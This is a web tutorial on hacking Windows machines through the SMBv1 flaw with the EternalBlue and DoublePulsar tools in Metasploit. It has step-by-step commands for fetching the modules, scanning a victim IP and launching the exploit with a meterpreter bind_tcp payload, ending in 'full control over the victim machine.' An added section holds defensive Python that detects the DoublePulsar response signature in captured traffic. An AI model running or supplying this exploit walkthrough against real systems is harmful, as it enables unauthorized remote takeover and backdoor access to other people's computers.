
How To Use EternalBlue and DoublePulsar Exploit to Hack Windows Machine

EternalBlue is an exploit developed by the National Security Agency (NSA) that targets Windows-based Server Message Block version 1 (SMBv1). The tool is believed to have been released in April 2017 by a hacker group popularly known as the Shadow Brokers, and it has been used in recent attacks such as the WannaCry cyber attack.

SMB version 1 (SMBv1), which ships in various versions of Microsoft Windows, accepts specially crafted packets from remote attackers. This is the cause of the vulnerability in the Windows operating system, which leads to remote code execution and particularly targeted Windows 7 and Windows XP.

The hackers also obtained the NSA tool called DOUBLEPULSAR, which is designed to provide covert backdoor access to a Windows machine.

Once DOUBLEPULSAR is installed on the machine, it waits for certain types of data to be sent over port 445. When that data arrives, the implant provides a distinctive response to the attacker.
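
That distinctive response is something a defender can look for in captured port 445 traffic. The following is an added example, not code from the original article or from Metasploit: it assumes the publicly documented detection signature (a Trans2 probe sent with multiplex ID 0x41 is answered with 0x51 by an implanted host), which this page does not state, and it runs on constructed sample frames.

```python
import struct

SMB1_MAGIC = b"\xffSMB"
CMD_TRANS2 = 0x32
# Assumption (public detection signature, not stated on this page):
# probes send multiplex ID 0x41 and an implanted host answers 0x51.
MID_PROBE, MID_IMPLANT = 0x41, 0x51


def parse_smb1(frame: bytes):
    """Return (command, status, mid) from a NetBIOS-framed SMBv1 message, or None."""
    if len(frame) < 4:
        return None
    length = int.from_bytes(frame[1:4], "big")    # 3-byte big-endian length
    smb = frame[4:4 + length]
    if len(smb) < 32 or smb[:4] != SMB1_MAGIC:
        return None                               # SMB2+, truncated, or not SMB
    command = smb[4]
    status = struct.unpack_from("<I", smb, 5)[0]  # NT status, little-endian
    mid = struct.unpack_from("<H", smb, 30)[0]    # multiplex ID, last header field
    return command, status, mid


def classify_exchange(request: bytes, response: bytes) -> str:
    """Compare a captured TCP/445 request with the server's reply."""
    req, rsp = parse_smb1(request), parse_smb1(response)
    if req is None or rsp is None:
        return "not-smb1"
    if req[0] != CMD_TRANS2 or rsp[0] != CMD_TRANS2:
        return "ignored"
    if rsp[2] == req[2]:
        return "normal"             # a server echoes the client's multiplex ID
    if (req[2], rsp[2]) == (MID_PROBE, MID_IMPLANT):
        return "doublepulsar-signature"
    return "mid-mismatch"           # unexpected; worth a closer look


def build_frame(command: int, status: int, mid: int) -> bytes:
    """Constructed sample: header-only SMBv1 message with NetBIOS framing."""
    smb = (SMB1_MAGIC + bytes([command]) + struct.pack("<I", status)
           + bytes(21) + struct.pack("<H", mid))
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


NOT_IMPLEMENTED = 0xC0000002  # STATUS_NOT_IMPLEMENTED, used in the constructed replies
PROBE = build_frame(CMD_TRANS2, 0, MID_PROBE)
CLEAN_REPLY = build_frame(CMD_TRANS2, NOT_IMPLEMENTED, MID_PROBE)
IMPLANT_REPLY = build_frame(CMD_TRANS2, NOT_IMPLEMENTED, MID_IMPLANT)

if __name__ == "__main__":
    for name, reply in (("clean", CLEAN_REPLY), ("implanted", IMPLANT_REPLY)):
        print(name, "->", classify_exchange(PROBE, reply))
```

A "mid-mismatch" result is not proof of an implant, only a protocol anomaly that deserves a closer look at the host.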

Using EternalBlue with Metasploit in simple steps

To use the tool, we need to download the scanner and the exploit and add them to Metasploit. Open a terminal window and type the following commands.

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb

After the download is finished, we run the next command in the terminal:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

Next, move the file smb_ms17_010.rb into the folder /usr/share/metasploit-framework/modules/auxiliary/scanner/smb

Then copy eternalblue_doublepulsar.rb and the deps folder into /usr/share/metasploit-framework/modules/exploits/windows/smb

Now open eternalblue_doublepulsar.rb with any editor and change the directory path for ETERNALBLUE and DOUBLEPULSAR to the SMB exploit directory, /usr/share/metasploit-framework/modules/exploits/windows/smb.

Then specify the name of the process to be injected; you can choose any process.

Then launch msfconsole and use the auxiliary scanner module smb_ms17_010.

> use auxiliary/scanner/smb/smb_ms17_010
> show options

Now set RHOSTS to the victim's IP address.

> set RHOSTS IP
> run

It will scan the host, check whether it is vulnerable, and display the victim machine's details.

Now we can move on to the EternalBlue and DoublePulsar exploit:

> use exploit/windows/smb/eternalblue_doublepulsar
> set payload windows/x64/meterpreter/bind_tcp
> show options

Then set the target architecture and RHOST, the victim's IP address.

> set RHOST IP
> set targetarchitecture x64
> show options

And then type exploit or run and hit enter.

Boom! It's done. If we did everything correctly, we will have a Meterpreter session and the vulnerability has been exploited.

The system has now been exploited successfully and we have full control over the victim machine.


This article is for educational purposes only. Any actions or activities related to the material contained within this website are solely your responsibility. Any misuse of the information on this website can result in criminal charges being brought against the persons in question. The authors and www.flexicron.com will not be held responsible in the event any criminal charges are brought against any individuals misusing the information on this website to break the law. Thank you.
